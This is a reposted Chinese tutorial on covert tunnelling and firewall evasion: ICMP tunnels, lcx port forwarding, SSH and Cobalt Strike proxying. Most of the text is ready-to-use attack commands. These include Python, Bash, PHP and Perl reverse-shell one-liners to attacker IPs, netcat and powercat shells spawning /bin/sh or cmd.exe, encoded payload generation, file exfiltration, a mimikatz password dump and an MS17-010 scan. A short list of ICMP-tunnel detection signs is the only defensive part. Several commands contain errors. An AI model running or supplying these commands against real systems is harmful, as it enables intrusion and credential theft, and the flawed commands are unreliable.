主頁 > 軟體設計 > 隱藏隧道通信技術

隱藏隧道通信技術

2021-10-11 15:34:53 軟體設計

隱藏隧道基礎知識

概述

網路在通信前會在兩臺機器建立TCP連接,然后進行通信,

隧道是繞過埠屏蔽的通信方式,防火墻兩端的資料包通過防火墻所允許的資料包型別或者進行封裝 ,然后穿過防火墻,與對方通信,

隧道列舉:

網路層:IPV6隧道,ICMP隧道,GRE隧道;

傳輸層:TCP隧道,UDP隧道,常規埠轉發,

應用層:SSH隧道,HTTP隧道,HTTS隧道,DNS 隧道

判斷內網連通性:

判斷協議:tcp,http,dns,icmp等;

允許流量出口的埠:80 ,8080,443,53,110,123等

1.ICMP協議:

ping 《ip或者域名》
在這里插入圖片描述

2.TCP協議

nc工具;

nc -zv 192.168.102.21 135

在這里插入圖片描述

3.HTTP協議

curl :curl www.baidu.com 80

在這里插入圖片描述

3.DNS協議

nslookup:(windows)

在這里插入圖片描述

網路層隧道技術(常用隧道協議:IPV6和ICMP )

Ipv6隧道技術簡介:

是通過IPv4隧道 IPv6資料報文的技術,把IPv6報文整體封裝在IPv4資料報文中,

執行隧道功能的節點的IPv6地址如果兼容IPv地址時,自動隧道是可行的 ,如果給執行隧道功能的節點分配地址采用的時自動隧道方法就不用進行配置;

配置隧道方法要求隧道末端節點 使用其他機制來獲得IPv4地址:DHCP,人工配置;

支持IPv6的隧道工具有socat 6tunnel,n6tunnel等,

ICMP隧道:

一般兩臺機器通信開放埠,但是ICMP不需要,最常見的就是ping命令:如果攻擊上層隧道(HTTP,DNS,正反代理轉發)都不行,那么就可以通過 ping命令訪問遠程機器,建立ICMP隧道,將TCP/UDP封裝進ICMP的ping命令中,從而穿過防火墻(防火墻不會屏蔽ping命令) ,

常用的ICMP工具:icmpsh,pingtunnel ,icmptunnel ,powershell icmp

icmpsh:

安裝python-impacket庫:

sudo apt-get install python-impacket

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1 

./run.sh

輸入之后在提示框輸入目標IP地址

在目標機輸入:

icmp.exe -t 192.168.1.7 -d 500 -b 30 -s 128

即可上線;

在這里插入圖片描述

2.Ping Tunnel

防御ICMP隧道攻擊的方法:

  • 檢測同一來源的ICMP資料包;
  • 注意payload大于64bit的ICMP資料包,
  • 尋找請求包payload與相應資料payload不一致的ICMP資料包,
  • 檢查ICMP資料包的協議標簽:icmp會在所有的ICMPpayload 前面加“TUNL”標記標識隧道;

傳輸層傳輸技術:

常用技術有TCP,UDP ,常規埠轉發等;

如果防火墻阻止了對指定埠的訪問,獲得目標機的權限可以用IPTABLES打開指定埠

lcx:

內網埠轉發:

把靶機的3389埠轉發到444埠;

靶機:lcx.exe -slave <公網IP> 444 127.0.0.1 3389

將本機的444埠監聽的所有資料轉到555埠;

vps: lcx.exe -listen 444 555

本地埠轉發:

lcx -tran <目標主機的Ip> 3389;

netcat:

cd netcat-0.7.1/
chmod +x configure
./configure
make

nc沒有-e選項解決方案:

原來安裝的默認是openbsd的,而openbsd是沒有-e選項的,需要變更為traditional版才有,
變更方法如下:
輸入
sudo update-alternatives --config nc
此時會顯示netcat的各個版本,輸入2選擇traditional

apt install netcat-traditional 
sudo update-alternatives --config nc
2

在這里插入圖片描述

banner 抓取:

提供當前網路中系統資訊和 運行服務的資訊

nc -nv 127.0.0.1. 80

連接遠程主機:

nc -nvv 187.65.1.207 445

埠掃描:

nc -v 127.0.0.1 80

nc -v -z  127.0.0.1 1-1024

在這里插入圖片描述

埠監聽:

當訪問該埠時會將資訊輸出到命令列:

nc -l -p 9999

在這里插入圖片描述

檔案傳輸:

VPS輸入:nc -lp 9999 >2.txt
目標主機輸入:nc -vn 127.0.0.1 9999 < /root/netcat-0.7.1/install-sh -q 1

在這里插入圖片描述

簡易聊天:

vps:nc -l -p 9999
目標主機: nc -vn 127.0.0.1 999

請添加圖片描述

獲取 shell:

正向shell:客戶端獲取服務器的shell;

反向shell:服務器獲取客戶端的shell;通常用在開啟防御措施的目標機器,例如防火墻過濾,埠轉發;

(1)正向shell:

靶機:nc 108.61.183.100 4444

在這里插入圖片描述

vps: nc -lvp 4444 -e /bin/sh
	 nc -lvp 4444 -e c:\windows\system32\cmd.exe

在這里插入圖片描述

(2)反向shell:

本機或者VPS主機:nc _lvp 9999

在這里插入圖片描述

目標機: nc -lvp 4444 -e /bin/sh
	   nc -lvp 4444 -e c:\windows\system32\cmd.exe

在目標主機沒有nc時獲取反向shell,通過常見的編程語言代替nc:

python:

目標機(ubuntu):python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.102.77",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在這里插入圖片描述

攻擊機監聽:

nc -lvp 2222

在這里插入圖片描述

Bash反向shell:

bash -i >& /dev/tcp/ip/port 0>&1

PHP反向shell:

php -r '$sock=fsockopen("192.168.102.67",2222);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

perl反向shell:

perl -e ‘ use Socket ;$i="192.168.102.67";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conect(s,socketaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

內網代理:

vps(192.168.102.109)→linux→web服務器(192.168.102.67 3333,不出網)

vps:nc -lvp 3333

linux: nc -lvp 3333 -e  /bin/sh

web: nc -v 192.168.102.109 3333 -c “nc -v 192.168.102.67 3333”

powercat:

Import-Module .\powercat.ps1
set-executionpolicy remotesigned(權限不夠時輸入)

通過nc正向連接powercat:

客戶機:powercat -l -p 8080 -e cmd.exe -v

kali:netcat 192.168.102.232 8080-vv
chcp 65001
powershell "./mimikatz.exe 'sekurlsa::logonPasswords full' > C:\Users\wxl\Desktop\14.txt 'exit'" 

在這里插入圖片描述

用powercat正向shell連接;mimikzta獲取密碼是dump不出來的;并且會彈powershell框
請添加圖片描述
請添加圖片描述

-l;監聽模式,用于入站連接;

-p指定監聽埠;

-e 啟動行程的名稱;

-v 顯示詳情;

nc反向連接shell:

kali:netcat -l -p 8080-vv

客戶機:powercat -c 192.168.102.232 -p 8080 -e cmd.exe 

通過powercat回傳powershell:

win10(102.55):powershell -l -p 9999 -v

在這里插入圖片描述

win7(102.232):powercat -c 192.168.102.55 -p 9999 -v -ep

在這里插入圖片描述

powercat 傳檔案:

win10:powercat -l -p 9999 -of 14.txt -v

win7:powercat -c 192.168.102.55 -p 9999 -i c:\users\wxl\desktop\14.txt -v

powercat 生成payload:

win7 :powercat -l -p 9999 -e cmd -v -g >> shell.ps1
將生成的payload上傳到win10,win7中執行命令:
powercat -c 192.168.102.55 -p 9999 -v

在這里插入圖片描述

反彈shell;

win7 :powercat -l -p 9999 -e cmd -v -g >> shell2.ps1
powercat -c 192.168.102.55 -p 9999 -v

生成經過編碼的payload:

win7 :powercat -c 192.168.102.55 -p 9999 -ep -ge
powercat -l -p 9999 -v

應用層隧道技術:

SSH協議:

  • 簡單的ssh命令:

此外,本文只討論SSH在Linux Shell中的用法,如果要在Windows系統中使用SSH,會用到另一種軟體PuTTY,這需要另文介紹,

二、最基本的用法

SSH主要用于遠程登錄,假定你要以用戶名user,登錄遠程主機host,只要一條簡單命令就可以了,

  $ ssh user@host

如果本地用戶名與遠程用戶名一致,登錄時可以省略用戶名,

  $ ssh host

SSH的默認埠是22,也就是說,你的登錄請求會送進遠程主機的22埠,使用p引數,可以修改這個埠,

  $ ssh -p 2222 user@host

在這里插入圖片描述

創建ssh隧道引數:

-c:壓縮傳輸,提高傳輸速度;
-f: 將ssh傳輸轉入后臺,不占用當前的shell;
-N:建立靜默鏈接,(看不到具體會話);
-g:允許遠程主機連接本地用于轉發的埠;
-l:本地埠轉發;
-r:遠程埠轉發;
-p:指定SSH埠;
-D:socks代理;

在這里插入圖片描述

1.埠轉發:

以Ubuntu為跳板將win7的3389埠映射到vps的1153埠上,就能通過1153訪問3389了

Cobalt Strike socks4代理:

在這里插入圖片描述
在這里插入圖片描述
在這里插入圖片描述
將payload復制到msf中,此時就是全域代理:
在這里插入圖片描述

掃描埠:
在這里插入圖片描述在這里插入圖片描述

掃描ms17-010:
請添加圖片描述

轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/308717.html

標籤:其他

上一篇:TCP/IP參考模型與標準協議

下一篇:Nginx 詳解

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 面試突擊第一季,第二季,第三季

    第一季必考 https://www.bilibili.com/video/BV1FE411y79Y?from=search&seid=15921726601957489746 第二季分布式 https://www.bilibili.com/video/BV13f4y127ee/?spm_id_fro ......

    uj5u.com 2020-09-10 05:35:24 more
  • 第三單元作業總結

    1.前言 這應該是本學期最后一次寫作業總結了吧。總體來說,對作業的節奏也差不多掌握了,作業做起來的效率也更高了。雖然和之前的作業一樣,作業中都要用到新的知識,但是相比之前,更加懂得了如何利用工具以及資料。雖然之間卡過殼,但總體而言,這幾次作業還算完成的比較好。 2.作業程序總結 相比前兩個單元,此單 ......

    uj5u.com 2020-09-10 05:35:41 more
  • 北航OO(2020)第四單元博客作業暨課程總結博客

    北航OO(2020)第四單元博客作業暨課程總結博客 本單元作業的架構設計 在本單元中,由于UML圖具有比較清晰的樹形結構,因此我對其中需要進行查詢操作的元素進行了包裝,在樹的父節點中存盤所有孩子的參考。考慮到性能問題,我采用了快取機制,一次查詢后盡可能快取已經遍歷過的資訊,以減少遍歷次數。 本單元我 ......

    uj5u.com 2020-09-10 05:35:48 more
  • BUAA_OO_第四單元

    一、UML決議器設計 ? 先看下題目:第四單元實作一個基于JDK 8帶有效性檢查的UML(Unified Modeling Language)類圖,順序圖,狀態圖分析器 MyUmlInteraction,實際上我們要建立一個有向圖模型,UML中的物件(元素)可能與同級元素連接,也可與低級元素相連形成 ......

    uj5u.com 2020-09-10 05:35:54 more
  • 6.1邏輯運算子

    邏輯運算子 1. && 短路與 運算式1 && 運算式2 01.運算式1為true并且運算式2也為true 整體回傳為true 02.運算式1為false,將不會執行運算式2 整體回傳為false 03.只要有一個運算式為false 整體回傳為false 2. || 短路或 運算式1 || 運算式2 ......

    uj5u.com 2020-09-10 05:35:56 more
  • BUAAOO 第四單元 & 課程總結

    1. 第四單元:StarUml檔案決議 本單元采用了圖模型決議UML。 UML檔案可以抽象為圖、子圖、邊的邏輯結構。 在實作中,圖的節點包括類、介面、屬性,子圖包括狀態圖、順序圖等。 采用了三次遍歷UML元素的方法建圖,第一遍遍歷建點,第二、三次遍歷設定屬性、連邊,實作圖物件的初始化。這里借鑒了一些 ......

    uj5u.com 2020-09-10 05:36:06 more
  • 談談我對C# 多型的理解

    面向物件三要素:封裝、繼承、多型。 封裝和繼承,這兩個比較好理解,但要理解多型的話,可就稍微有點難度了。今天,我們就來講講多型的理解。 我們應該經常會看到面試題目:請談談對多型的理解。 其實呢,多型非常簡單,就一句話:呼叫同一種方法產生了不同的結果。 具體實作方式有三種。 一、多載 多載很簡單。 p ......

    uj5u.com 2020-09-10 05:36:09 more
  • Python 資料驅動工具:DDT

    背景 python 的unittest 沒有自帶資料驅動功能。 所以如果使用unittest,同時又想使用資料驅動,那么就可以使用DDT來完成。 DDT是 “Data-Driven Tests”的縮寫。 資料:http://ddt.readthedocs.io/en/latest/ 使用方法 dd. ......

    uj5u.com 2020-09-10 05:36:13 more
  • Python里面的xlrd模塊詳解

    那我就一下面積個問題對xlrd模塊進行學習一下: 1.什么是xlrd模塊? 2.為什么使用xlrd模塊? 3.怎樣使用xlrd模塊? 1.什么是xlrd模塊? ?python操作excel主要用到xlrd和xlwt這兩個庫,即xlrd是讀excel,xlwt是寫excel的庫。 今天就先來說一下xl ......

    uj5u.com 2020-09-10 05:36:28 more
  • 當我們創建HashMap時,底層到底做了什么?

    jdk1.7中的底層實作程序(底層基于陣列+鏈表) 在我們new HashMap()時,底層創建了默認長度為16的一維陣列Entry[ ] table。當我們呼叫map.put(key1,value1)方法向HashMap里添加資料的時候: 首先,呼叫key1所在類的hashCode()計算key1 ......

    uj5u.com 2020-09-10 05:36:38 more
最新发布
  • 【中介者設計模式詳解】C/Java/JS/Go/Python/TS不同語言實作

    * 中介者模式是一種行為型設計模式,它可以用來減少類之間的直接依賴關系,
    * 將物件之間的通信封裝到一個中介者物件中,從而使得各個物件之間的關系更加松散。
    * 在中介者模式中,物件之間不再直接相互互動,而是通過中介者來中轉訊息。 ......

    uj5u.com 2023-04-20 08:20:47 more
  • 露天煤礦現場調研和交流案例分享

    他們集團的資訊化公司及研究院在一個礦區正在做智能礦山的統一平臺的 試點,專案投資大概1億,包括了礦山的各方面的內容,顯示得我們這次交流有點多余。他們2年前開始做智能礦山的規劃,有很多煤礦行業專家的加持,他們的描述是非常完美,但是去年底應該上線的平臺,現在還沒有看到影子。他們確實有很多場景需求,但是被... ......

    uj5u.com 2023-04-20 08:20:25 more
  • 《社區人員管理》實戰案例設計&個人案例分享

    設計是一個讓人夢想成真程序,開始編碼、測驗、除錯之前進行需求分析和架構設計,才能保證關鍵方面都做正確 ......

    uj5u.com 2023-04-20 08:20:17 more
  • 軟體架構生態化-多角色交付的探索實踐

    作為一個技術架構師,不僅僅要緊跟行業技術趨勢,還要結合研發團隊現狀及痛點,探索新的交付方案。在日常中,你是否遇到如下問題 “ 業務需求排期長研發是瓶頸;非研發角色感受不到研發技改提效的變化;引入ISV 團隊又擔心質量和安全,培訓周期長“等等,基于此我們探索了一種新的技術體系及交付方案來解決如上問題。 ......

    uj5u.com 2023-04-20 08:20:10 more
  • 【中介者設計模式詳解】C/Java/JS/Go/Python/TS不同語言實作

    * 中介者模式是一種行為型設計模式,它可以用來減少類之間的直接依賴關系,
    * 將物件之間的通信封裝到一個中介者物件中,從而使得各個物件之間的關系更加松散。
    * 在中介者模式中,物件之間不再直接相互互動,而是通過中介者來中轉訊息。 ......

    uj5u.com 2023-04-20 08:19:44 more
  • 露天煤礦現場調研和交流案例分享

    他們集團的資訊化公司及研究院在一個礦區正在做智能礦山的統一平臺的 試點,專案投資大概1億,包括了礦山的各方面的內容,顯示得我們這次交流有點多余。他們2年前開始做智能礦山的規劃,有很多煤礦行業專家的加持,他們的描述是非常完美,但是去年底應該上線的平臺,現在還沒有看到影子。他們確實有很多場景需求,但是被... ......

    uj5u.com 2023-04-20 08:19:07 more
  • 《社區人員管理》實戰案例設計&個人案例分享

    設計是一個讓人夢想成真程序,開始編碼、測驗、除錯之前進行需求分析和架構設計,才能保證關鍵方面都做正確 ......

    uj5u.com 2023-04-20 08:18:57 more
  • 軟體架構生態化-多角色交付的探索實踐

    作為一個技術架構師,不僅僅要緊跟行業技術趨勢,還要結合研發團隊現狀及痛點,探索新的交付方案。在日常中,你是否遇到如下問題 “ 業務需求排期長研發是瓶頸;非研發角色感受不到研發技改提效的變化;引入ISV 團隊又擔心質量和安全,培訓周期長“等等,基于此我們探索了一種新的技術體系及交付方案來解決如上問題。 ......

    uj5u.com 2023-04-20 08:18:49 more
  • 05單件模式

    #經典的單件模式 public class Singleton { private static Singleton uniqueInstance; //一個靜態變數持有Singleton類的唯一實體。 // 其他有用的實體變數寫在這里 //構造器宣告為私有,只有Singleton可以實體化這個類! ......

    uj5u.com 2023-04-19 08:42:51 more
  • 【架構與設計】常見微服務分層架構的區別和落地實踐

    軟體工程的方方面面都遵循一個最基本的道理:沒有銀彈,架構分層模型更是如此,每一種都有各自優缺點,所以請根據不同的業務場景,并遵循簡單、可演進這兩個重要的架構原則選擇合適的架構分層模型即可。 ......

    uj5u.com 2023-04-19 08:42:41 more